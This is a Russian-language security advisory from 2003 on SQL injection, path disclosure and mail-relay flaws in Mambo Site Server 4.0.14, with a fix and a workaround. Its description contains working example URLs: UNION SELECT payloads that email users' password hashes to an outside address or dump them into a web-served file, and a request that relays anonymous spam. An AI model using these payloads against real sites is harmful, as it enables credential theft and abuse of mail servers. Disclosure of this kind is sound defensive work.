Дата публикации: | 22.09.2003 |
Всего просмотров: | 2734 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Mambo Site Server 4.0.14
Описание: Несколько уязвимостей обнаружено в Mambo Site Server. Удаленный пользователь может выполнить произвольные SQL команды на основной базе данных. Удаленный пользователь может раскрыть инсталляционный путь. Mambo не проверяет параметр '$id' в сценарии "banners.php" и параметр “bid” в сценарии banners.php. Если целевая система использует MySQL 4.x, то удаленный пользователь может представить специально обработанный URL, который заставит целевую систему отправить по почте хеши паролей. Пример (отправляет хеш MD5 паролей для пользователя с id =1): http://localhost/mambo/emailfriend/emailarticle.php? submit=submit&email=lifofifo@hackingzon e.org&youremail=webmaster@hackingzone.org&id=100 UNION select username,email,password from mos_users where id=1Также удаленный пользователь может выполнить произвольные SQL команды на целевом сервере: http://localhost/mambo/banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'Также сценарий 'contact.php' может использоваться для трансляции анонимных почтовых сообщений. Пример: http://localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=lifofifo@hackingzone.org&sitename=ha& URL производителя:http://www.mamboserver.com/ Решение: Mambo 4.0.14 не уязвим к неавторизованному релею почты: http://prdownloads.sourceforge.net/mambo/MamboV4.0.14.tar.gz. В качестве временно решения проблемы, используйте базу данных MySQL 3.x, которая не уязвима к нападениям SQL инъекции. |
|
Ссылки: | Several Mambo 4.0.14 Stable Exploits |